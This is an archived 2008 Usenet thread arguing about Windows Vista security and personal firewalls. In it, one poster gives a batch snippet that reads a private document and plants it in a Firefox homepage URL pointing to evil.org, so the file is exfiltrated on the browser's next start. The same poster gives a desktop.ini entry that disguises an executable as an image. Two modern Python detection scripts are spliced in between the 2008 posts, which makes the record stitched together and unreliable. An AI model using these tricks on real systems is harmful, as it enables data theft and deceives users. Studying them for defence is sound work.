Microsoft Firewall vs ????



quodnomentibi@remailed.ws
03-25-08, 12:35 AM
I just got a new laptop a few days ago, running Vista Home Premium. I am
in the midst of "customizing" it. Presently, I am running the Microsoft
Firewall. Is this an act of blind faith on my part? In the last few
months of life of my last laptop, I ran Comodo Pro and was satisfied.

I'd prefer to run a free firewall, if that is prudent.

Any suggestions?

Thanks for your time and attention.

Q.N. Tibi


Sebastian G.
03-25-08, 01:06 AM
quodnomentibi@remailed.ws wrote:


> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it. Presently, I am running the Microsoft
> Firewall. Is this an act of blind faith on my part.


Yes. Windows Vista is trivially insecure.

> In the last few
> months of life of my last laptop, I ran Comodo Pro and was satisfied.


The only question is if this wasn't even worse.


> I'd prefer to run a free firewall, if that is prudent.
>
> Any suggestions?


Wipfw. But first you need to get rid of Vista.

Kayman
03-25-08, 04:29 AM
On Mon, 24 Mar 2008 23:35:12 -0600 (MDT), quodnomentibi@remailed.ws wrote:
>
> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it. Presently, I am running the Microsoft
> Firewall. Is this an act of blind faith on my part. In the last few
> months of life of my last laptop, I ran Comodo Pro and was satisfied.
>
> I'd prefer to run a free firewall, if that is prudent.
>
> Any suggestions?
>
The best defenses are:
1. Do not work in elevated level; Day-to-day work should be
performed while the User Account Control (UAC) is enabled. Turning
off UAC reduces the security of your computer and may expose you to
increased risk from malicious software.
2. Familiarize yourself with "Services Hardening in Windows Vista".
3. Keep your operating system (OS) (and all software on it)
updated/patched.
4. Reconsider the usage of IE.
5. Review your installed 3rd party software applications/utilities;
Remove clutter.
6. Don't expose services to public networks.
7. Activate the built-in firewall and tack together its advanced
configuration settings.
7a. If on high-speed internet use a router as well.
8. Routinely practice safe-hex.
9. Regularly back-up data/files.
10. Familiarize yourself with crash recovery tools and with
re-installing your operating system (OS).
11. Utilize a real-time anti-virus application and vital system
monitoring utilities/applications.
12. Keep abreast of the latest developments - ***** happens...you know.

The least preferred defenses are:
Myriads of popular anti-whatever applications and staying ignorant.

Peez of pith, really :-)

Sebastian G.
03-25-08, 05:55 AM
Kayman wrote:


> The best defenses are:
> 1. Do not work in elevated level;


Doesn't matter; in Windows Vista it's trivial to elevate with any consent.

> Day-to-day work should be
> performed while the User Account Control (UAC) is enabled.


UAC is trivial to spoof, and since it doesn't apply to all administrative
actions it's trivially insecure. Even further, since there's no need to
approve administrative actions if an elevated program is running in the
desktop context of an unprivileged user, it's even more insecure.


> 4. Reconsider the usage of IE.


There is nothing to reconsider. IE is a perfectly fine ActiveX Rich Platform
Client, a wonderful platform to implement complex software clients in a
trusted environment.
The only problem is that some people seem to understand it as a web browser,
and consequently abuse it as such. Obviously a stupid idea.

> 7a. If on high-speed internet use a router as well.


Huh? Why?

> 9. Regularly back-up data/files.


And why isn't this #1?

> 11. Utilize a real-time anti-virus application


Wonderful idea. Introduce a horribly buggy and pretty useless piece of
software....

Victek
03-25-08, 11:22 AM
> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it. Presently, I am running the Microsoft
> Firewall. Is this an act of blind faith on my part. In the last few
> months of life of my last laptop, I ran Comodo Pro and was satisfied.
>
> I'd prefer to run a free firewall, if that is prudent.
>
> Any suggestions?
>
> Thanks for your time and attention.
>
> Q.N. Tibi

I'm running Comodo firewall pro v3 on Vista and it's been fine. I also like
Online Armor and there will be a Vista compatible version in the near
future.

Sebastian G.
03-25-08, 03:05 PM
Victek wrote:


> I'm running Comodo firewall pro v3 on Vista and it's been fine.


Which only shows that you never bothered auditing it.

> I also like Online Armor

Which supports my claim, since this one is even worse.

OK, one shouldn't expect much if any understanding of security from a
Windows Live Mail user... but please, if you have no clue, then please don't
make suggestions to others.

s|b
03-25-08, 03:25 PM
On Tue, 25 Mar 2008 21:05:56 +0100, Sebastian G. wrote:

> OK, one shouldn't expect much if any understanding of security from a
> Windows Live Mail user... but please, if you have no clue, then please don't
> make suggestions to others.

It's a good thing you are here to show us The Way, oh Wise One... |-)

--
s|b

goarilla
03-26-08, 01:44 PM
Sebastian G. wrote:
> quodnomentibi@remailed.ws wrote:
>
>
>> I just got a new laptop a few days ago, running Vista Home Premium. I am
>> in the midst of "customizing" it. Presently, I am running the Microsoft
>> Firewall. Is this an act of blind faith on my part.
>
>
> Yes. Windows Vista is trivially insecure.
>
do you have some evidence stating that fact?
are you talking about microsoft os'es in general?
since i really need some evidence to put on the table
so my boss stops looking into vista as a worthy domain
OS
>> In the last few
>> months of life of my last laptop, I ran Comodo Pro and was satisfied.
>
>
> The only question is if this wasn't even worse.
>
>
>> I'd prefer to run a free firewall, if that is prudent.
>>
>> Any suggestions?
>
>
> Wipfw. But first you need to get rid of Vista.

Sebastian G.
03-26-08, 01:49 PM
goarilla <"kevin<punt>paulus|"@|skynet punt> wrote:


>> Yes. Windows Vista is trivially insecure.
>>
> do you have some evidence stating that fact?


- you can spoof filenames via desktop.ini, which itself can be triggered by
shell namespaces
- UAC doesn't apply to all administrative actions and is trivial to spoof;
if you run as admin, it is trivial to circumvent; it provides no isolation;
if a file includes a prudent application manifest or triggers the setup
program detection, it won't even let you run a program without elevation
- PatchGuard makes it trivial to corrupt kernel memory just by debugging an
application in usermode
- not even talking about what system access you get granted for simply
presenting a DRMed media file...

> are you talking about microsoft os'es in general?


No. NT 5.1 and 5.2 look pretty secure.

> since i really need some evidence to put on the table
> so my boss stops looking into vista as a worthy domain
> OS


Oh, that's simple: Install it on his computer so he can try it for a while.
Very likely that after two weeks he'll be fed up with it.

Q
03-26-08, 04:45 PM
Sebastian G. wrote:

> Wipfw. But first you need to get rid of Vista.

Please qualify your comment about issues with Vista security. As you
always do, you talk out of your arse.

Sebastian G.
03-26-08, 06:54 PM
Q wrote:

> Sebastian G. wrote:
>
>> Wipfw. But first you need to get rid of Vista.
>
> Please qualify your comment about issues with Vista security. As you
> always do, you talk out of your arse.


<news:64vk7lF25nl57U1@mid.dfncis.de>

Q
03-26-08, 07:16 PM
Sebastian G. wrote:

> <news:64vk7lF25nl57U1@mid.dfncis.de>

Is that your email address and news should be mail?

Why can't you post proof of concept links here? Sorry for the talking
out of your arse comment. It was uncalled for. Would just like to see
some proof of what you say though.

Sebastian G.
03-26-08, 10:56 PM
Q wrote:

> Sebastian G. wrote:
>
>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>
> Is that your email address and news should be mail?


No, it's a reference to one of my postings in this thread. Is your
newsreader that defective?

> Why can't you post proof of concept links here?


Actually you can easily derive a PoC just from the description. For example
the filename localization issue is well known, and you can take already
existing desktop.ini files utilizing this feature directly from the Vista
installation. Or, for example, a privilege that doesn't require UAC consent is
SE_BACKUP_RESTORE_PRIVILEGE, which allows you to bypass all ACLs and grants
access to the raw disk.
On the other hand, you'll find in-detail information about the
implementation of PatchGuard at <http://uninformed.org/>. With a bit of
detailed understanding, you'll see that debugging heavily interacts with
PatchGuard in almost unforeseen ways (since it is, by itself, nothing but a
dirty kernel hack).

Rat River Cemetary
03-26-08, 11:14 PM
Sebastian G. wrote:
>
> No, it's a reference to one of my postings in this thread. Is your
> newsreader that defective?

There is no proof in any of your postings to this thread.

Rat River Cemetary
03-26-08, 11:42 PM
Sebastian G. wrote:

> Actually you can easily derive a PoC just from the description. For
> example the filename localization issue is well known, and you can take
> already existing desktop.ini files utilizing this feature directly from
> the Vista installation. Or, for example, a privilege that doesn't require
> UAC consent is SE_BACKUP_RESTORE_PRIVILEGE, which allows you to bypass all
> ACLs and grants access to the raw disk.
> On the other hand, you'll find in-detail information about the
> implementation of PatchGuard at <http://uninformed.org/>. With a bit of
> detailed understanding, you'll see that debugging heavily interacts with
> PatchGuard in almost unforeseen ways (since it is, by itself, nothing but
> a dirty kernel hack).

Every OS has exploits and is continually being patched. Linux has plenty
of its own, you just don't hear about them as much or they get patched
quietly in the background. So your whole point is what exactly?

Sebastian G.
03-27-08, 12:21 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Actually you can easily derive a PoC just from the description. For
>> example the filename localization issue is well known, and you can take
>> already existing desktop.ini files utilizing this feature directly from
>> the Vista installation. Or, for example, a privilege that doesn't require
>> UAC consent is SE_BACKUP_RESTORE_PRIVILEGE, which allows you to bypass all
>> ACLs and grants access to the raw disk.
>> On the other hand, you'll find in-detail information about the
>> implementation of PatchGuard at <http://uninformed.org/>. With a bit of
>> detailed understanding, you'll see that debugging heavily interacts with
>> PatchGuard in almost unforeseen ways (since it is, by itself, nothing but
>> a dirty kernel hack).
>
> Every OS has exploits and is continually being patched. Linux has plenty
> of its own, you just don't hear about them as much or they get patched
> quietly in the background. So your whole point is what exactly?


Seems like you don't even understand the difference between random and
systematic errors...

Sebastian G.
03-27-08, 12:21 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>> No, it's a reference to one of my postings in this thread. Is your
>> newsreader that defective?
>
> There is no proof in any of your postings to this thread.


I never presented it as a proof, nor has anyone asked for one.

Rat River Cemetary
03-27-08, 11:26 AM
Sebastian G. wrote:

>
> I never presented it as a proof, nor has anyone asked for one.

I have and still see no positive proof from you.

Rat River Cemetary
03-27-08, 11:27 AM
Sebastian G. wrote:

> Seems like you don't even understand the difference between random and
> systematic errors...

Seems like you are nothing but a windbag full of hot air. All talk and
no action.

Rat River Cemetary
03-27-08, 12:02 PM
Sebastian G. wrote:

> Which supports my claim, since this one is even worse.
>
> OK, one shouldn't expect much if any understanding of security from a
> Windows Live Mail user... but please, if you have no clue, then please
> don't make suggestions to others.

I saw you once post proof of concept code to prove that any software
firewall can be bypassed. Would you please post that again as I want to
read it again, thanks.

Rat River Cemetary
03-28-08, 02:05 AM
Sebastian G. wrote:

> Seems like you don't even understand the difference between random and
> systematic errors...

Still waiting for your proof. BTW, so are some other people over at a
reputable web forum. They claim you are a Usenet loon and have no actual
proof. Put up or shut up.

Volker Birk
03-28-08, 07:08 AM
Rat River Cemetary <dead@rat.here> wrote:
> I saw you once post proof of concept code to prove that any software
> firewall can be bypassed. Would you please post that again as I want to
> read it again, thanks.

Hi,

for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).

After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
breakout-wp.cpp - and they lost again.

This topic is somewhat boring now.

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

Sebastian G.
03-28-08, 07:58 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Which supports my claim, since this one is even worse.
>>
>> OK, one shouldn't expect much if any understanding of security from a
>> Windows Live Mail user... but please, if you have no clue, then please
>> don't make suggestions to others.
>
> I saw you once post proof of concept code to prove that any software
> firewall can be bypassed. Would you please post that again as I want to
> read it again, thanks.


You mean something like this one?

setlocal enabledelayedexpansion
set x=
for /f "delims=" %%i in (your_private_document.txt) do set x=!x! %%i
for /r %%i in (prefs.js) do echo user_pref("browser.startup.homepage","http://evil.org/catch.pl?!x!");>>"%%i"

And then just wait until the user starts Firefox...

Sebastian G.
03-28-08, 07:59 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Seems like you don't even understand the difference between random and
>> systematic errors...
>
> Still waiting for your proof.


Are you really too stupid to simply write a desktop.ini with the content:

[LocalizedFilenames]
foo.exe=bar.jpg

and place it onto your desktop?
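
A defender-side check for the desktop.ini trick described above, added here as an example (it is not code posted by anyone in the thread). It walks a directory tree, parses each desktop.ini, and reports [LocalizedFileNames] entries that make Explorer show a runnable file under a name with a different, harmless-looking extension. The folder layout, the stand-in foo.exe and the readme.txt entry are constructed for the demo; only the foo.exe=bar.jpg mapping comes from the thread.

```python
"""Scan a directory tree for desktop.ini [LocalizedFileNames] entries that make
Explorer display an executable under a harmless-looking name.

Added example for this thread, not code posted by any participant. The
directory layout and the file names are constructed here; the only thing
taken from the thread is the foo.exe=bar.jpg mapping.
"""
import configparser
import os
import tempfile
from pathlib import Path

# Extensions that Windows will run (or, for .lnk, follow) on double-click.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif",
                   ".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".lnk"}


def parse_localized_names(ini_text):
    """Return {real filename: displayed name} from [LocalizedFileNames].

    INI section names are case-insensitive on Windows, so the spelling
    [LocalizedFilenames] used in the thread is accepted as well.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep the filename's case
    cp.read_string(ini_text)
    section = next((s for s in cp.sections()
                    if s.lower() == "localizedfilenames"), None)
    return dict(cp.items(section)) if section else {}


def suspicious_mappings(ini_text):
    """List (real, shown) pairs where a runnable file is displayed with a
    different extension. Values starting with '@' are resource-string
    references (e.g. @shell32.dll,-21769), not literal names, and are skipped."""
    hits = []
    for real, shown in parse_localized_names(ini_text).items():
        if shown.startswith("@"):
            continue
        real_ext = Path(real).suffix.lower()
        if real_ext in EXECUTABLE_EXTS and Path(shown).suffix.lower() != real_ext:
            hits.append((real, shown))
    return hits


def _read_ini(path):
    """desktop.ini may be UTF-16 with a BOM; fall back to UTF-8 otherwise."""
    data = Path(path).read_bytes()
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16")
    return data.decode("utf-8-sig", errors="replace")


def scan_tree(root):
    """Walk root and report every disguised entry, noting whether the real
    file is actually present next to the desktop.ini."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        ini = next((f for f in files if f.lower() == "desktop.ini"), None)
        if ini is None:
            continue
        for real, shown in suspicious_mappings(_read_ini(os.path.join(dirpath, ini))):
            findings.append({
                "folder": dirpath,
                "real": real,
                "shown": shown,
                "exists": os.path.exists(os.path.join(dirpath, real)),
            })
    return findings


def demo():
    """Build a throwaway folder with the thread's foo.exe=bar.jpg mapping and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "foo.exe").write_bytes(b"MZ")  # constructed stand-in for a program
        Path(tmp, "desktop.ini").write_text(
            "[LocalizedFileNames]\n"
            "foo.exe=bar.jpg\n"
            "readme.txt=@shell32.dll,-21769\n",
            encoding="utf-8")
        return scan_tree(tmp)


if __name__ == "__main__":
    for hit in demo():
        print(f"{hit['folder']}: {hit['real']} shown as {hit['shown']}"
              f" (file present: {hit['exists']})")
```

Point it at a user profile (Desktop, Downloads, removable media) rather than the whole system: Explorer only applies desktop.ini to folders carrying the read-only or system attribute, so a hit in a folder that also has one of those attributes set is the one worth looking at first, and the `exists` flag separates a live disguise from a stale mapping.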

Victek
03-28-08, 11:09 AM
>> I saw you once post proof of concept code to prove that any software
>> firewall can be bypassed. Would you please post that again as I want to
>> read it again, thanks.
>
> Hi,
>
> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>
> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
> breakout-wp.cpp - and they lost again.
>
> This topic is somewhat boring now.
>
> Yours,
> VB.

No security is perfect. Why does the fact you can break it imply that it
has no value?

Volker Birk
03-28-08, 11:21 AM
Victek <victek@invalid.invalid> wrote:
>>> I saw you once post proof of concept code to prove that any software
>>> firewall can be bypassed. Would you please post that again as I want to
>>> read it again, thanks.
>> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
>> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
>> breakout-wp.cpp - and they lost again.
>> This topic is somewhat boring now.
> No security is perfect. Why does the fact you can break it imply that it
> has no value?

Because I needed 15 minutes to break it the first time, and a meal with
friends on a Saturday evening to **** up the second time.

And: we had a closer look onto common "Personal Firewall"
implementations, and all what I saw was a terrible, incompetent mess.

Yours,
VB.

Sebastian G.
03-28-08, 12:28 PM
Victek wrote:

>>> I saw you once post proof of concept code to prove that any software
>>> firewall can be bypassed. Would you please post that again as I want to
>>> read it again, thanks.
>> Hi,
>>
>> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
>> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>>
>> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
>> breakout-wp.cpp - and they lost again.
>>
>> This topic is somewhat boring now.
>>
>> Yours,
>> VB.
>
> No security is perfect. Why does the fact you can break it imply that it
> has no value?

Security requires reliability. The above shows a reliability of zero.

Rat River Cemetary
03-28-08, 03:50 PM
Sebastian G. wrote:

>
> Are you really too stupid to simply write a desktop.ini with the content:
>
> [LocalizedFilenames]
> foo.exe=bar.jpg
>
> and place it onto your desktop?

I'm talking about all of your claims and not just that one. Calling me
stupid does nothing for your credibility at all so either stop with the
hostile attitude and provide your own proof of concept or admit you are
a liar and nothing but a Usenet loon.

Sebastian G.
03-28-08, 04:00 PM
Rat River Cemetary wrote:


> I'm talking about all of your claims and not just that one. Calling me
> stupid does nothing for your credibility at all so either stop with the
> hostile attitude and provide your own proof of concept or admit you are
> a liar and nothing but a Usenet loon.


Or not willing to waste my time on trivial things that I consider being easy
enough for you to figure it out on your own. As if I would care what you're
thinking of me...

Rat River Cemetary
03-28-08, 09:19 PM
Sebastian G. wrote:

> Or not willing to waste my time on trivial things that I consider being
> easy enough for you to figure it out on your own. As if I would care
> what you're thinking of me...

Here's what my man on the inside has to say to you. Loon!

"Neither the batch commands, nor the .c programs are remote exploits of
a firewall. The batch files just seem to copy prefs.js around the
system, it doesn't attain Admin from a limited user nor does it execute
code on remote systems, so it's not an exploit. Ditto for the .c
programs, they just send messages to other windows, windows is designed
to allow that. That is not a demonstration of a remote exploit or local
privilege escalation exploit.

Also, in Vista you can't send a high integrity process (admin services
and programs with admin privileges) a message from a lower integrity
processes, like say medium integrity (non-UAC prompting programs)
processes or low integrity processes (sandboxed programs like IE7). And
neither can low integrity processes send message to medium integrity
processes.
Ergo, something like this might work in XP but not in Vista if you run
as the system was designed to run (with UAC on).

What you asked about is Vista, and these are not Vista exploits."

Rat River Cemetary
03-28-08, 09:19 PM
Volker Birk wrote:

> Hi,
>
> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>
> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
> breakout-wp.cpp - and they lost again.
>
> This topic is somewhat boring now.
>
> Yours,
> VB.

Man on the inside says this.

"Neither the batch commands, nor the .c programs are remote exploits of
a firewall. The batch files just seem to copy prefs.js around the
system, it doesn't attain Admin from a limited user nor does it execute
code on remote systems, so it's not an exploit. Ditto for the .c
programs, they just send messages to other windows, windows is designed
to allow that. That is not a demonstration of a remote exploit or local
privilege escalation exploit.

Also, in Vista you can't send a high integrity process (admin services
and programs with admin privileges) a message from a lower integrity
processes, like say medium integrity (non-UAC prompting programs)
processes or low integrity processes (sandboxed programs like IE7). And
neither can low integrity processes send message to medium integrity
processes.
Ergo, something like this might work in XP but not in Vista if you run
as the system was designed to run (with UAC on).

What you asked about is Vista, and these are not Vista exploits."

Rat River Cemetary
03-28-08, 09:24 PM
Sebastian G. wrote:

> Yes. Windows Vista is trivially insecure.

Care to comment on the below?

http://dvlabs.tippingpoint.com/blog/2008/03/28/pwn-to-own-final-day-and-wrap-up

Volker Birk
03-28-08, 09:50 PM
Rat River Cemetary <dead@rat.here> wrote:
> Volker Birk wrote:
>> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
>> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
>> breakout-wp.cpp - and they lost again.
>> This topic is somewhat boring now.
> Man on the inside says this.
> "Neither the batch commands, nor the .c programs are remote exploits of
> a firewall.

What "batch files"? Is this text about something else?

> What you asked about is Vista, and these are not Vista exploits."

I did not talk about Vista, but about "Personal Firewalls".

And I'm not talking about remote exploits or exploits at all.

Yours,
VB.

Rat River Cemetary
03-28-08, 10:29 PM
Volker Birk wrote:

> What "batch files"? Is this text about something else?

Sebastian posted a batch file that I included in with your code. He is
referring to that.


> I did not talk about Vista, but about "Personal Firewalls".
>
> And I'm not talking about remote exploits or exploits at all.
>
> Yours,
> VB.

You're right.

Sebastian G.
03-29-08, 01:26 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Yes. Windows Vista is trivially insecure.
>
> Care to comment on the below?
>
> http://dvlabs.tippingpoint.com/blog/2008/03/28/pwn-to-own-final-day-and-wrap-up


Obviously the guy wanted the MacBook Air (I'd want it too), and the guys who
wanted the Wintel notebook didn't manage to prepare the pre-made IE exploits
fast enough.

Sebastian G.
03-29-08, 01:31 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Or not willing to waste my time on trivial things that I consider being
>> easy enough for you to figure it out on your own. As if I would care
>> what you're thinking of me...
>
> Here's what my man on the inside has to say to you. Loon!


See below for the obvious reasons why I don't care for the opinions of idiots...

> "Neither the batch commands, nor the .c programs are remote exploits of
> a firewall.


I never claimed a remote exploit.

> The batch files just seems to copy prefs.js around the
> system,


********. It reads the content of a file, puts it into a URL and writes to
prefs.js to set it as the default homepage. The next time the user starts up
Firefox, the homepage is surfed to, and the data are transmitted this way.

> it doesn't attain Admin from a limited user nor does it execute
> code on remote systems, so it's not an exploit. Ditto for the .c
> programs, they just send messages to other windows, windows is designed
> to allow that. That is not a demonstration of a remote exploit or local
> privilege escalation exploit.


But it is an exploit against the application security feature of personal
firewalls.

> Also, in Vista you can't send a high integrity process (admin services
> and programs with admin privileges) a message from a lower integrity
> processes, like say medium integrity (non-UAC prompting programs)
> processes or low integrity processes (sandboxed programs like IE7).


Wrong as well. Clipboard commands, NetDDE and COM+ Remoting are allowed,
also Named Pipes, Mailslots, Shared Sections, BaseNameObjects, JobObjects
etc. are shared.

> What you asked about is Vista, and these are not Vista exploits."


Never claimed those to be Vista exploits, even though they work quite well
under Vista.
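
The batch snippet Sebastian G. posted earlier in the thread, and his explanation of it above, describe the same pattern: a preference line appended to prefs.js so that the next browser start carries file content out in a URL. Added here as an example (not code from the thread) is the matching audit a defender can run over a profile's prefs.js: it parses the user_pref lines, notes preferences that appear more than once (an appended override leaves the original line in place), and flags a startup page that is off an allow-list, carries an oversized query string, or contains whitespace. The sample prefs.js, the host example.invalid, the allow-list and the 200-character threshold are all constructed for this example.

```python
"""Audit a Firefox prefs.js for a hijacked startup page.

Added example, not code from the thread. It parses user_pref("name", value)
lines, keeps track of preferences that are set more than once (an appended
line leaves the earlier one in place), and flags a browser.startup.homepage
whose URL looks like a data carrier rather than a bookmark. The sample
prefs.js, the host example.invalid and the allow-list are constructed.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

# One user_pref(...) statement per line; the name may contain escaped quotes.
PREF_RE = re.compile(r'^\s*user_pref\("((?:[^"\\]|\\.)*)",\s*(.*?)\);\s*$', re.M)


def parse_prefs(text):
    """Return (prefs, duplicated_names). Later lines win, as in Firefox."""
    prefs, seen = {}, Counter()
    for name, raw in PREF_RE.findall(text):
        raw = raw.strip()
        if len(raw) >= 2 and raw[0] == raw[-1] == '"':
            value = re.sub(r'\\(.)', r'\1', raw[1:-1])  # undo \" and \\ escapes
        elif raw in ("true", "false"):
            value = raw == "true"
        else:
            try:
                value = int(raw)
            except ValueError:
                value = raw
        prefs[name] = value
        seen[name] += 1
    return prefs, sorted(n for n, c in seen.items() if c > 1)


def homepage_findings(prefs, allowed_hosts=("www.mozilla.org",), max_query=200):
    """Flag startup pages that are off the allow-list, carry an oversized
    query string, or contain whitespace (raw file content pasted into a URL)."""
    home = prefs.get("browser.startup.homepage")
    if not isinstance(home, str):
        return []
    findings = []
    for url in home.split("|"):  # Firefox separates several startup pages with '|'
        url = url.strip()
        parts = urlsplit(url)
        reasons = []
        if parts.hostname and parts.hostname.lower() not in allowed_hosts:
            reasons.append("host not on allow-list")
        if len(parts.query) > max_query:
            reasons.append("oversized query string")
        if re.search(r"\s", url):
            reasons.append("whitespace inside URL")
        if reasons:
            findings.append({"url": url, "host": parts.hostname,
                             "query_len": len(parts.query), "reasons": reasons})
    return findings


# Constructed prefs.js: a legitimate homepage followed by an appended override
# carrying the text of a document in the query string.
SAMPLE_PREFS = r'''// Mozilla User Preferences
user_pref("app.update.enabled", true);
user_pref("browser.startup.homepage", "http://www.mozilla.org/");
user_pref("browser.startup.page", 1);
user_pref("browser.startup.homepage", "http://example.invalid/catch.pl? Project Zeta budget 2008: 1,250,000 USD; draft, do not forward");
'''


def audit(text=SAMPLE_PREFS):
    """Run both checks over a prefs.js body and return the combined report."""
    prefs, dups = parse_prefs(text)
    return {"duplicates": dups, "homepage": homepage_findings(prefs)}


if __name__ == "__main__":
    report = audit()
    print("preferences set more than once:", report["duplicates"])
    for f in report["homepage"]:
        print(f"{f['host']}: {', '.join(f['reasons'])} (query {f['query_len']} chars)")
```

The duplicate check is the cheap one: Firefox rewrites prefs.js as a clean file on shutdown, so a preference that appears twice means something other than the browser touched the file since the last clean exit. Run the audit against `audit(open(path).read())` for each profile, and extend `allowed_hosts` with whatever your users actually set.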

Rat River Cemetary
03-31-08, 10:56 AM
Sebastian G. wrote:

> Obviously the guy wanted the MacBook Air (I'd want it too), and the guys
> who wanted the Wintel notebook didn't manage to prepare the pre-made IE
> exploits fast enough.


IE7 on Vista runs in protected mode and is the most secure browser there
is because of it. Unless of course you run something like OB1 that
doesn't support any scripting at all. Because of your hostile attitude
and lack of objectivity I must end our conversation because you are not
worth my time and are a nasty ********ter. I hope others are smart
enough to see you for what you really are.

Sebastian G.
03-31-08, 11:51 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Obviously the guy wanted the MacBook Air (I'd want it too), and the guys
>> who wanted the Wintel notebook didn't manage to prepare the pre-made IE
>> exploits fast enough.
>
>
> IE7 on Vista runs in protected mode and is the most secure browser there
> is because of it.


Nonsense. IE by itself is as easy to compromise as ever, and breaking out of
the protected mode is trivial[1][2].

> Because of your hostile attitude
> and lack of objectivity I must end our conversation because you are not
> worth my time and are a nasty ********ter. I hope others are smart
> enough to see you for what you really are.

One should rather hope that others are smart enough to not fall for your
obviously ridiculous claims about others.

[1] http://uninformed.org/?v=8&a=6&t=sumry
[2] http://blogs.technet.com/markrussinovich/archive/2007/02/12/638372.aspx

Volker Birk
03-31-08, 11:36 PM
Rat River Cemetary <dead@rat.here> wrote:
> IE7 on Vista runs in protected mode and is the most secure browser there
> is because of it.

Unless IE stops supporting ActiveX and thus supporting manipulating
arbitrary COM objects, it's a security nightmare and not "the most
secure browser".

ActiveX is a design flaw, and never can be fixed.

Yours,
VB.

Rat River Cemetary
04-01-08, 05:23 AM
Volker Birk wrote:

> Unless IE stops supporting ActiveX and thus supporting manipulating
> arbitrary COM objects, it's a security nightmare and not "the most
> secure browser".
>
> ActiveX is a design flaw, and never can be fixed.
>
> Yours,
> VB.

I use FF with NoScript but nothing can compromise the OS by running IE7
because it runs in protected memory space.

Sebastian G.
04-01-08, 05:48 AM
Rat River Cemetary wrote:


> I use FF with NoScript but nothing can compromise the OS by running IE7
> because it runs in protected memory space.


Unless you simply break out of it, which is trivial.

Volker Birk
04-01-08, 06:25 AM
Rat River Cemetary <dead@rat.here> wrote:
> Volker Birk wrote:
>> Unless IE stops supporting ActiveX and thus supporting manipulating
>> arbitrary COM objects, it's a security nightmare and not "the most
>> secure browser".
>> ActiveX is a design flaw, and never can be fixed.
> I use FF with NoScript but nothing can compromise the OS by running IE7
> because it runs in protected memory space.

That's wrong.

COM offers the possibility for IPC (DCOM, COM+).

Yours,
VB.

goarilla@work
04-02-08, 05:17 AM
Sebastian G. wrote:
> Q wrote:
>
>> Sebastian G. wrote:
>>
>>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>>
>> Is that your email address and news should be mail?
>
>
> No, it's a reference to one of my postings in this thread. Is your
> newsreader that defective?
>
thunderbird doesn't understand it as well

Sebastian G.
04-02-08, 06:03 AM
goarilla@work wrote:

> Sebastian G. wrote:
>> Q wrote:
>>
>>> Sebastian G. wrote:
>>>
>>>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>>> Is that your email address and news should be mail?
>>
>> No, it's a reference to one of my postings in this thread. Is your
>> newsreader that defective?
>>
> thunderbird doesn't understand it as well


Very strange, since Mozilla Mail does. Maybe the URL protocol helper for
"news:" is broken?

Rat River Cemetary
04-02-08, 02:23 PM
Sebastian G. wrote:

> Very strange, since Mozilla Mail does. Maybe the URL protocol helper for
> "news:" is broken?

I use portable Thunderbird for news so it is not registered in the
registry as my news reader. When I clicked your link Microsoft Mail
tried to open it because that is what is registered on my system for
news but I only use that for Mail and not news. You should not assume
everyone has their PC configured the same as you.

Sebastian G.
04-02-08, 02:25 PM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Very strange, since Mozilla Mail does. Maybe the URL protocol helper for
>> "news:" is broken?
>
> I use portable Thunderbird for news so it is not registered in the
> registry as my news reader. When I clicked your link Microsoft Mail
> tried to open it because that is what is registered on my system for
> news but I only use that for Mail and not news. You should not assume
> everyone has their PC configured the same as you.


Now it's my fault that you didn't set it up properly... "news:" is one of
the few well known protocol handlers which one may safely assume to be working.

Even further, it's the standard way of referencing Usenet postings. Even
further, there simply is no other.

Dave
04-03-08, 02:04 AM
goarilla <"kevin<punt>paulus|"@|skynet punt> wrote:
> Sebastian G. wrote:
>> quodnomentibi@remailed.ws wrote:
>>
>>
>>> I just got a new laptop a few days ago, running Vista Home Premium.
>>> I am
>>> in the midst of "customizing" it. Presently, I am running the Microsoft
>>> Firewall. Is this an act of blind faith on my part.
>>
>>
>> Yes. Windows Vista is trivially insecure.


